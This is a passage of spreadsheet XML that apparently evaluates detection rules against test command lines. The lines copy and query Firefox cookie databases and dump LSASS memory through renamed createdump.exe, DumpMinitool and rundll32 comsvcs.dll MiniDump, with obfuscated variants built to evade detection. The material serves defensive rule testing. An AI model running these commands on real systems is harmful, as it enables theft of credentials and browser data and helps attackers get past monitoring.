          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C332" s="44" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D332" s="44" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E332" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F332" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G332" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H332" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I332" s="44" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J332" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K332" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="333" ht="15.75" customHeight="1" s="42">
      <c r="A333" s="44" t="n"/>
      <c r="B333" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C333" s="44" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D333" s="44" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E333" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F333" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G333" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H333" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I333" s="44" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J333" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K333" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="334" ht="15.75" customHeight="1" s="42">
      <c r="A334" s="44" t="n"/>
      <c r="B334" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C334" s="44" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D334" s="44" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E334" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F334" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G334" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H334" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I334" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J334" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K334" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="335" ht="15.75" customHeight="1" s="42">
      <c r="A335" s="43" t="n"/>
      <c r="B335" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C335" s="44" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D335" s="44" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E335" s="44" t="inlineStr">
        <is>
          <t>mkdir C:\Temp\Extensions\ &amp;&amp; copy DumpMinitool.exe C:\Temp\Extensions\DumpMinitool.exe &amp;&amp; C:\Temp\Extensions\DumpMinitool.exe --file C:\Temp\memory.dmp --processId 752 --dumpType Full</t>
        </is>
      </c>
      <c r="F335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I335" s="43" t="n"/>
      <c r="J335" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K335" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="336" ht="15.75" customHeight="1" s="42">
      <c r="A336" s="43" t="n"/>
      <c r="B336" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C336" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D336" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E336" s="44" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe -u -"f" C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F336" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G336" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H336" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I336" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J336" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K336" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="337" ht="15.75" customHeight="1" s="42">
      <c r="A337" s="43" t="n"/>
      <c r="B337" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C337" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D337" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E337" s="44" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe -U -"f" C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F337" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G337" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H337" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I337" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J337" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K337" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="338" ht="15.75" customHeight="1" s="42">
      <c r="A338" s="43" t="n"/>
      <c r="B338" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C338" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D338" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E338" s="44" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe -U -F C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F338" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G338" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H338" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I338" s="43" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution (1a1ed54a-2ba4-4221-94d5-01dee560d71e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J338" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K338" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="339" ht="15.75" customHeight="1" s="42">
      <c r="A339" s="43" t="n"/>
      <c r="B339" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C339" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D339" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E339" s="44" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe /"u" /"f" C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F339" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G339" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H339" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I339" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J339" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K339" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="340" ht="15.75" customHeight="1" s="42">
      <c r="A340" s="43" t="n"/>
      <c r="B340" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C340" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D340" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E340" s="44" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe /"u" -f C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F340" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G340" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H340" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I340" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J340" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K340" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="341" ht="15.75" customHeight="1" s="42">
      <c r="A341" s="43" t="n"/>
      <c r="B341" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C341" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D341" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E341" s="44" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe /"u" -F C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F341" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G341" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H341" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I341" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J341" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K341" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="342" ht="15.75" customHeight="1" s="42">
      <c r="A342" s="43" t="n"/>
      <c r="B342" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C342" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D342" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E342" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --full --name /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F342" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G342" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H342" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I342" s="44" t="n"/>
      <c r="J342" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K342" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="343" ht="15.75" customHeight="1" s="42">
      <c r="A343" s="43" t="n"/>
      <c r="B343" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C343" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D343" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E343" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe -"-full" --name /"tmp/lsass_dump.bin" 632</t>
        </is>
      </c>
      <c r="F343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I343" s="44" t="n"/>
      <c r="J343" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K343" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="344" ht="15.75" customHeight="1" s="42">
      <c r="A344" s="43" t="n"/>
      <c r="B344" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C344" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D344" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E344" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe -"-full" --nAME /TMP/lsAss_dUmp.BIN 632</t>
        </is>
      </c>
      <c r="F344" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G344" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H344" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I344" s="44" t="n"/>
      <c r="J344" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K344" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="345" ht="15.75" customHeight="1" s="42">
      <c r="A345" s="43" t="n"/>
      <c r="B345" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C345" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D345" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E345" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --FUlL --name /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F345" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G345" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H345" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I345" s="44" t="n"/>
      <c r="J345" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K345" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="346" ht="15.75" customHeight="1" s="42">
      <c r="A346" s="43" t="n"/>
      <c r="B346" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C346" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D346" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E346" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --fULL /"-name" -"tmp/lsass_dump.bin" 632</t>
        </is>
      </c>
      <c r="F346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I346" s="44" t="n"/>
      <c r="J346" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K346" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="347" ht="15.75" customHeight="1" s="42">
      <c r="A347" s="43" t="n"/>
      <c r="B347" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C347" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D347" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E347" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --FuLL /"-name" /tMP/lSaSS_DuMp.bin 632</t>
        </is>
      </c>
      <c r="F347" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G347" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H347" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I347" s="43" t="n"/>
      <c r="J347" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K347" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="348" ht="15.75" customHeight="1" s="42">
      <c r="A348" s="43" t="n"/>
      <c r="B348" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C348" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D348" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E348" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --full --name /tMp/LSaSs_DUMp.bIn 632</t>
        </is>
      </c>
      <c r="F348" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G348" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H348" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I348" s="43" t="n"/>
      <c r="J348" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K348" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="349" ht="15.75" customHeight="1" s="42">
      <c r="A349" s="43" t="n"/>
      <c r="B349" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C349" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D349" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E349" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --fulL --name /"tmp/lsass_dump.bin" 632</t>
        </is>
      </c>
      <c r="F349" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G349" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H349" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I349" s="44" t="n"/>
      <c r="J349" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K349" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="350" ht="15.75" customHeight="1" s="42">
      <c r="A350" s="43" t="n"/>
      <c r="B350" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C350" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D350" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E350" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe /"-full" -"-name" /TmP/lSass_dUMp.BIN 632</t>
        </is>
      </c>
      <c r="F350" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G350" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H350" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I350" s="44" t="n"/>
      <c r="J350" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K350" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="351" ht="15.75" customHeight="1" s="42">
      <c r="A351" s="43" t="n"/>
      <c r="B351" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C351" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D351" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E351" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --full --NaMe /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F351" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G351" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H351" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I351" s="44" t="n"/>
      <c r="J351" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K351" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="352" ht="15.75" customHeight="1" s="42">
      <c r="A352" s="43" t="n"/>
      <c r="B352" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C352" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D352" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E352" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe -"-full" -"-name" /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F352" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G352" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H352" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I352" s="44" t="n"/>
      <c r="J352" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K352" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="353" ht="15.75" customHeight="1" s="42">
      <c r="A353" s="43" t="n"/>
      <c r="B353" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C353" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D353" s="44" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E353" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" rundll32.exe C:\Windows\System32\com^svcs.dll,Mini^Dump 600 lsass.dmp f^ull</t>
        </is>
      </c>
      <c r="F353" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G353" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H353" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I353" s="4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353" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K353" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="354" ht="15.75" customHeight="1" s="42">
      <c r="A354" s="43" t="n"/>
      <c r="B354" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C354" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D354" s="44" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E354" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" rundll32.exe C:\Windows\System32\com^svcs.dll,Mini^Dump 600 lsass.dmp f^ull</t>
        </is>
      </c>
      <c r="F354" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G354" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H354" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I354" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL (646ea171-dded-4578-8a4d-65e9822892e3); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J354" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K354" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="355" ht="15.75" customHeight="1" s="42">
      <c r="A355" s="43" t="n"/>
      <c r="B355" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C355" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D355" s="44" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E355" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe comsvcs.dll,#131096 600 C:\temp\lsass.dmp full</t>
        </is>
      </c>
      <c r="F355" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G355" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H355" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I355" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J355" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K355" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="356" ht="15.75" customHeight="1" s="42">
      <c r="A356" s="43" t="n"/>
      <c r="B356" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C356" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D356" s="44" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E356" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp
enamed_file.dll, MiniDump &lt;PID&gt; C:\Temp\dump.bin full</t>
        </is>
      </c>
      <c r="F356" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G356" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H356" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I356" s="44" t="inlineStr">
        <is>
